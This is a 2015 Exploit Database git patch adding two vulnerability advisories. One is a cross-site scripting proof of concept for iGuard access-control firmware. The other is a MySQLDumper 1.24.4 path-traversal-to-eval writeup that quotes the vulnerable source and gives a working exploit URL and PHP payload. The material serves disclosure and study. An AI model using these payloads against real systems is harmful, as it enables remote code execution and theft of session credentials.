From 3f7869520454d4ce884530a5f206ae9246f35d42 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Fri, 29 May 2015 05:02:13 +0000
Subject: [PATCH] DB: 2015-05-29

2 new exploits
---
 files.csv                            |  2 +
 platforms/hardware/webapps/37135.txt |  7 +++
 platforms/php/webapps/37134.php      | 83 ++++++++++++++++++++++++++++
 3 files changed, 92 insertions(+)
 create mode 100755 platforms/hardware/webapps/37135.txt
 create mode 100755 platforms/php/webapps/37134.php

diff --git a/files.csv b/files.csv
index 8fd1577ed..cf6aef787 100755
--- a/files.csv
+++ b/files.csv
@@ -33513,3 +33513,5 @@ id,file,description,date,author,platform,type,port
 37131,platforms/php/webapps/37131.txt,"MySQLDumper 1.24.4 main.php Multiple Function CSRF",2012-04-27,AkaStep,php,webapps,0
 37132,platforms/php/webapps/37132.txt,"WordPress Plugin Free Counter 1.1 Stored XSS",2015-05-27,"Panagiotis Vagenas",php,webapps,80
 37133,platforms/php/webapps/37133.txt,"MySQLDumper 1.24.4 index.php page Parameter XSS",2012-04-27,AkaStep,php,webapps,0
+37134,platforms/php/webapps/37134.php,"MySQLDumper 1.24.4 'menu.php' Remote PHP Code Execution Vulnerability",2012-04-27,AkaStep,php,webapps,0
+37135,platforms/hardware/webapps/37135.txt,"iGuard Security Access Control Device Firmware 3.6.7427A Cross Site Scripting Vulnerability",2012-05-02,"Usman Saeed",hardware,webapps,0
diff --git a/platforms/hardware/webapps/37135.txt b/platforms/hardware/webapps/37135.txt
new file mode 100755
index 000000000..47526d002
--- /dev/null
+++ b/platforms/hardware/webapps/37135.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/53355/info
+
+iGuard Security Access Control is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input in the embedded web server.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example.com/></font><IFRAME SRC="JAVASCRIPT:alert('XSS Found by Usman Saeed , Xc0re Security Research Group');">.asp 
\ No newline at end of file
diff --git a/platforms/php/webapps/37134.php b/platforms/php/webapps/37134.php
new file mode 100755
index 000000000..9bd9ed30f
--- /dev/null
+++ b/platforms/php/webapps/37134.php
@@ -0,0 +1,83 @@
+source: http://www.securityfocus.com/bid/53310/info
+
+MySQLDumper is prone to a vulnerability that lets remote attackers execute arbitrary code because the application fails to sanitize user-supplied input.
+
+Attackers can exploit this issue to execute arbitrary PHP code within the context of the affected webserver process.
+
+MySQLDumper 1.24.4 is vulnerable; other versions may also be affected. 
+
+Vulnerable code section:
+/*
+//menu.php
+if (isset($_POST['selected_config'])||isset($_GET['config']))
+{
+if (isset($_POST['selected_config'])) $new_config=$_POST['selected_config'];
+// Configuration was switched in content frame?
+if (isset($_GET['config'])) $new_config=$_GET['config'];
+// restore the last active menuitem
+if (is_readable($config['paths']['config'].$new_config.'.php'))
+{
+clearstatcache();
+unset($databases);
+$databases=array();
+if (read_config($new_config))
+{
+$config['config_file']=$new_config;
+$_SESSION['config_file']=$new_config; //$config['config_file'];
+$config_refresh='
+<script language="JavaScript" type="text/javascript">
+if (parent.MySQL_Dumper_content.location.href.indexOf("config_overview.php")!=-1)
+{
+var selected_div=parent.MySQL_Dumper_content.document.getElementById("sel").value;
+}
+else selected_div=\'\';
+parent.MySQL_Dumper_content.location.href=\'config_overview.php?config='.urlencode($new_config).'&sel=\'+selected_div</script>';
+}
+if (isset($_GET['config'])) $config_refresh=''; //Neu-Aufruf bei Uebergabe aus Content-Bereich verhindern
+}
+}
+
+
+
+*/
+As you can see we can traverse it +
+
+if we will look to read_config() function
+//inc/functions_global.php
+
+function read_config($file=false)
+{
+global $config,$databases;
+$ret=false;
+if (!$file) $file=$config['config_file'];
+// protect from including external files
+$search=array(':', 'http', 'ftp', ' ');
+$replace=array('', '', '', '');
+$file=str_replace($search,$replace,$file);
+
+if (is_readable($config['paths']['config'].$file.'.php'))
+{
+// to prevent modern server from caching the new configuration we need to evaluate it this way
+clearstatcache();
+$f=implode('',file($config['paths']['config'].$file.'.php'));
+$f=str_replace('<?php','',$f);
+$f=str_replace('?>','',$f);
+eval($f);
+$config['config_file']=$file;
+$_SESSION['config_file']=$config['config_file'];
+$ret=true;
+}
+return $ret;
+}
+
+this means remote attacker can iterate his/her code as PHP.(Notice: eval($f))
+
+Our exploit:
+http://www.example.com/learn/cubemail/menu.php?config=../../ss
+where ss = ss.php
+#cat ss.php # in eg attacker uploaded his/her own file:
+echo 'Our command executed ' . getcwd();
+phpinfo();
+
+
+